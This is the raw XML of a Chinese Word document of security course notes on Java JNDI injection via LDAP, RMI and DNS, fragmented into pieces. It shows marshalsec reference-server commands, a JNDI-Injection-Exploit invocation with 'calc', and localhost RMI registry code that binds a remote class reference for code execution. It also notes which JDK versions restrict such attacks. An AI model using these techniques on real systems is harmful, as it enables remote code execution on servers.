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566A" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;JNDI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&amp;RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务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高版本限制绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF02BC" w14:textId="0AB571CD" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242C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02CE9D16" wp14:editId="660937FA">
            <wp:extent cx="5274310" cy="1901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8EB86" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242C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超级全局变量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数据库通讯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身份验证技术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-Cookie&amp;Session&amp;Token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弱类型脆弱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函数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数据类型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开发组件集合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模版引擎渲染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第三方编辑器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写法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-ThinkPHP-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文件安全操作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上传读取删除包含等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代码审计文件安全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代码执行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命令注入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PHP-PHP.INI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全局文件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单函数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PHP-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流量检测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&amp;AI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算法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语法模型概念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-JQuery&amp;Axios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-Ajax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文件上传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用户登录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&amp;BOM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JS-DOM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数据加密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代码混淆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数据解密安全案例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开发环境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功能实现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案例分析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-NodeJS-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特有漏洞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代码审计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构建打包器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-WebPack-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源码泄漏还原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搭建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架构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微信小程序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编译调试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反编译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泄露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-JavaEE-Servlet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技术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监听器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过滤器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构建工具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-Maven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-JDBC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-Mybatis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-Hibernate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-JavaEE-ORM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框架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预编译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类加载器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反射机制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链安全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成员变量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成员方法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构造方法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动态代理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-JavaEE-readObject&amp;toString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方法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原生序列化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-URLDNS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-JavaEE-FastJson-JdbcRowSetImpl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链分析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---------------------------------------------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-LADP&amp;RMI&amp;DNS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、安全开发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-JavaEE-JNDI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项目工具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手工原理等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具体点：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</w:p>
    <w:p w14:paraId="598025A8" w14:textId="3CA49CA4" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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4B6D15F4" wp14:editId="3BA4CEF7">
            <wp:extent cx="5274310" cy="377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7DCB" w14:textId="737F49EE" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242C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32F01DFE" wp14:editId="7FA4E201">
            <wp:extent cx="5271135" cy="20491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8"/>
        <w:gridCol w:w="7126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F242CC" w14:paraId="76248AF9" w14:textId="77777777" w:rsidTr="00F242CC">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EB72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B38D78" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242C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584B5"/>
              </w:rPr>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EB72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46FB54" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC">
            <w:pPr>
              <w:pStyle w:val="paragraph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2584B5"/>
              </w:rPr>
              <w:t>作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F242CC" w14:paraId="5C54F90A" w14:textId="77777777" w:rsidTr="00F242CC">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="F5CBA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5AE8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LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2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505837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轻量级目录访问协议，约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F242CC" w14:paraId="0FA95D10" w14:textId="77777777" w:rsidTr="00F242CC">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8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E2E447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RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8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C43FF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JAVA 远程方法协议，该协议用于远程调用应用程序编程接口，使客户机上运行的程序可以调用远程服务器上的对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F242CC" w14:paraId="347204F3" w14:textId="77777777" w:rsidTr="00F242CC">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="F5CBAE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3F6F7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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBCDD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065EDC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域名服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F242CC" w14:paraId="04278E19" w14:textId="77777777" w:rsidTr="00F242CC">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8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34AEC1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lastRenderedPageBreak/>
              <w:t>CORBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="F5CBAE"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBCDD1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8DECB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20D8BD" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC">
            <w:pPr>
              <w:pStyle w:val="paragraph"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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公共对象请求代理体系结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C831AD6" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA98811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-JavaEE-Servlet&amp;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路由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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED5C5A0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过滤器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Filter&amp;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监听器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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B4F9D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-JavaEE-Maven&amp;JDBC&amp;Mybatis&amp;Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9EE42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-JavaEE-ORM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框架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预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05364AF9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类加载器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反射机制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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6E2A4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成员变量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构造方法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成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A915930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动态代理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</w:p>
    <w:p w14:paraId="45175556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利用链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危险方法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重写方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31A859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原生反序列化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&amp;URLDNS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2B142B96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-JavaEE-FastJson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反序列化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&amp;JDBC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链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8D762" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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开发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-JavaEE-JNDI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&amp;LDAP&amp;RMI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服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCBA5C9" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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思考明白：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什么是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为什么有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注入安全问题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JDNI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注入利用条件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参考：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blog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csdn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net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dupei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article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details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120534024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全称为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Naming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and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DirectoryInterface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（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命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源。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支持的服务主要有：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CORBA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等。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：远程方法调用注册表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：轻量级目录访问协议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调用检索：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lastRenderedPageBreak/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为了将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对象存储在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Naming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Directory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服务下，提供了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Naming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Reference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功能，对象可以通过绑定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Reference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存储在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Naming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或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Directory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服务下，比如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等。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javax.naming.InitialContext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服务中调用了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InitialContext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的类有：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org.springframework.transaction.jta.JtaTransactionManager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readObject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com.sun.rowset.JdbcRowSetImpl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execute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javax.management.remote.rmi.RMIConnector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connect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org.hibernate.jmx.StatisticsService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setSessionFactoryJNDIName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sfJNDIName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服务中调用了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InitialContext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的类有：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InitialDirContext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Spring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LdapTemplate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LdapTemplate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mbechler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marshalsec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、编译调用对象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javac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Test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、使用利用工具生成调用协议（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cp marshalsec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0.0.3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SNAPSHOT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jar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marshalsec.jndi.LDAPRefServer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0.0.0.0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Test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cp marshalsec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0.0.3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SNAPSHOT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jar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marshalsec.jndi.RMIRefServer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http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0.0.0.0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Test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、将生成的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存放访问路径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项目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://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github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welk1n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Injection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Exploit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java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jar JNDI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Injection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Exploit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1.0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SNAPSHOT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jar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"calc"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xx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注入手工：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//bind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：将名称绑定到对象中；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//lookup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：通过名字检索执行的对象；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//Reference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类表示对存在于命名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目录系统以外的对象的引用。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//Reference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参数：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//className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：远程加载时所使用的类名；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//classFactory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：加载的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class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中需要实例化类的名称；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//classFactoryLocation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：远程加载类的地址，提供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classes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数据的地址可以是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file/ftp/http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等协议；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注册监听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Registry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registry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LocateRegistry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createRegistry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7778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Reference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reference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Reference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"calc"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"calc"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"http://127.0.0.1:8089/"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lastRenderedPageBreak/>
        <w:t>ReferenceWrapper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wrapper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ReferenceWrapper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reference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registry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bind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"RCE"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wrapper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Clinet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连接触发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String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uri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"rmi://127.0.0.1:7778/RCE"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;</w:t>
      </w:r>
      <w:r>
        <w:br/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InitialContext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initialContext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new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InitialContext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();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initialContext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lookup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);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高版本注入绕过：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JDK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u45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u21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useCodebaseOnly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的默认值被设置为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。当该值为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true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时，将禁用自动加载远程类文件，仅从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CLASSPATH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和当前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JVM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server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指定路径加载类文件。使用这个属性来防止客户端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VM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从其他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地址上动态加载类，增加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RMI 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ClassLoader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安全性。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JDK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u141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u131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u121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增加了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trustURLCodebase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选项，默认为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，禁止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CORBA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协议使用远程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的选项，因此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RMI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CORBA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在以上的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JDK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版本上已经无法触发该漏洞，但依然可以通过指定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URI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为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协议来进行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注入攻击。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JDK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u211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7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u201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8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u191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之后：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增加了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sun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jndi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trustURLCodebase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选项，默认为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false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，禁止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协议使用远程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codebase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的选项，把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LDAP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协议的攻击途径也给禁了。</w:t>
      </w:r>
      <w:r>
        <w:br/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高版本绕过：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见后续</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD4A68"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java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安全篇章课程将讲到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA41265" w14:textId="77777777" w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC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8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0E957E63" w14:textId="77777777" w:rsidR="008A4FA4" w:rsidRDefault="008A4FA4"/>
    <w:sectPr w:rsidR="008A4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4971"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67F48F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07"/>
    <w:rsid w:val="001E6007"/>
    <w:rsid w:val="008A4FA4"/>
    <w:rsid w:val="00F2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00910-A790-4EE1-BB9D-54155FE9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42CC"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr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F242CC"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman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F242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F242C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242CC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24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1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q.com/doc/DQ3Z6RkNpaUtMcE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2025-02-27T10:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>